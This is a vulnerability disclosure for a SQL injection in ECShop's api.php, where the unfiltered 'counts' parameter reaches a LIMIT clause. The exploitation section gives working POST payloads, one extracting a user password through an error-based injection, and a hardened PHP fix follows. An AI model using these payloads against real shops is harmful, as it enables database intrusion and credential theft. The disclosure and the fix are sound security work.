### Brief description:

Yesterday morning I had nothing to do, so I downloaded the latest version of ECShop to challenge myself... In the afternoon a customer-service girl called to ask why I had downloaded ECShop, haha.. I have to say, her voice was pretty sweet... To win that iPad, it looks like I still have to earn rank...

### Detailed description:

Note: requires shop-owner privileges.

#1 Vulnerable code

This vulnerability is fairly simple; the developers probably just overlooked it...

```
if (is_numeric($_POST['last_modify_st_time']) && is_numeric($_POST['last_modify_en_time']))
{
    $sql = 'SELECT COUNT(*) AS count' .
           ' FROM ' . $GLOBALS['ecs']->table('goods') .
           " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)";
    $date_count = $GLOBALS['db']->getRow($sql);
    if (empty($date_count))
    {
        api_err('0x003', 'no data to back'); // no matching data
    }
    $page   = empty($_POST['pages'])  ? 1   : $_POST['pages'];  // decide which records to read
    $counts = empty($_POST['counts']) ? 100 : $_POST['counts']; // good grief, no filtering here at all...
    $sql = 'SELECT goods_id, last_update AS last_modify' .
           ' FROM ' . $GLOBALS['ecs']->table('goods') .
           " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)" .
           " LIMIT " . ($page - 1) * $counts . ', ' . $counts; // heavens, it goes straight into the SQL statement...
    //exit($sql);
    $date_arr = $GLOBALS['db']->getAll($sql); // OH! My god, and it is just executed directly...
```

In this code, the `counts` parameter arriving via POST:

```
$counts = empty($_POST['counts']) ? 100 : $_POST['counts'];
```

As you can see, it passes through no filtering at all. Reading on:

```
$sql = 'SELECT goods_id, last_update AS last_modify' .
       ' FROM ' . $GLOBALS['ecs']->table('goods') .
       " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > '" . $_POST['last_modify_st_time'] . "' OR last_update = 0)" .
       " LIMIT " . ($page - 1) * $counts . ', ' . $counts; // heavens, it goes straight into the SQL statement...
```

See that? Good heavens, it is concatenated straight into the SQL statement... and executed directly right after:
```
$date_arr = $GLOBALS['db']->getAll($sql);
```

#2 Exploitation

This vulnerability is fairly simple; the proof of concept follows.

Step 1: visit http://www.secmap.cn/ecshop/api.php and at the same time POST the following:

```
ac=true&act=search_goods_list&last_modify_st_time=111&last_modify_en_time=1&api_version=1.0&pages=1&counts=1 union select count(*) from (select 1 union select null union select !1)x group by concat((select password from ecs_users limit 1),floor(rand(0)*2)) -- s
```

The result is an error, as shown:

![1.jpg](https://images.seebug.org/upload/201403/1414321031136574cb8d47e6a3d8eb6241505e86.jpg)

### Proof of vulnerability:

#3 Proof of vulnerability

```
counts=1 union select user(),version()#23
```

![2.jpg](https://images.seebug.org/upload/201403/141433348110a5ddfa4ad8cfb32ede7879d6dd19.jpg)
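For comparison, here is a hardened version of the paging logic from the vulnerable snippet in #1. This is an added example, not ECShop's own code or its official fix; the `TablePrefix` class is a constructed stand-in for `$GLOBALS['ecs']->table()`, and the `last_modify_en_time` check is left out because that value never reaches the query.

```php
<?php
// Added example (not ECShop's own code): a hardened version of the paging
// logic from the vulnerable snippet above. LIMIT cannot be parameterised in
// most DB layers, so the only safe input is an integer that the code itself
// has coerced and bounded; anything else is rejected rather than interpolated.

// Constructed stand-in for $GLOBALS['ecs']->table() so the example runs alone.
final class TablePrefix
{
    private string $prefix;
    public function __construct(string $prefix) { $this->prefix = $prefix; }
    public function table(string $name): string { return $this->prefix . $name; }
}

// Mirrors the original empty() ? default : value choice, then validates.
function validated_int(array $post, string $key, int $default, int $min, int $max): int
{
    $raw = empty($post[$key]) ? $default : $post[$key];
    // FILTER_VALIDATE_INT rejects "1 union select ...", "1.5", "1e3" and out-of-range values.
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => $min, 'max_range' => $max]]);
    if ($v === false) {
        throw new InvalidArgumentException("invalid value for $key");
    }
    return $v;
}

function build_goods_list_sql(array $post, TablePrefix $ecs): string
{
    $st_time = validated_int($post, 'last_modify_st_time', 0, 0, PHP_INT_MAX);
    $page    = validated_int($post, 'pages',  1,   1, 100000);
    $counts  = validated_int($post, 'counts', 100, 1, 500); // also caps the page size
    $offset  = ($page - 1) * $counts;

    // Every interpolated value is now a PHP int, so no quoting or escaping is involved.
    return 'SELECT goods_id, last_update AS last_modify'
         . ' FROM ' . $ecs->table('goods')
         . " WHERE is_delete = 0 AND is_on_sale = 1 AND (last_update > $st_time OR last_update = 0)"
         . " LIMIT $offset, $counts";
}

$ecs = new TablePrefix('ecs_');
echo build_goods_list_sql(['last_modify_st_time' => '111', 'pages' => '2', 'counts' => '50'], $ecs), "\n";

try {
    // The shape of the report's payload (integer followed by a UNION) no longer reaches the query.
    build_goods_list_sql(['last_modify_st_time' => '111', 'counts' => '1 union select user(),version()#'], $ecs);
} catch (InvalidArgumentException $e) {
    echo 'rejected: ', $e->getMessage(), "\n";
}
```

Rejecting malformed paging values outright, instead of casting them, also makes such requests visible in the application's error log, which is where a defender would look for probing of this endpoint.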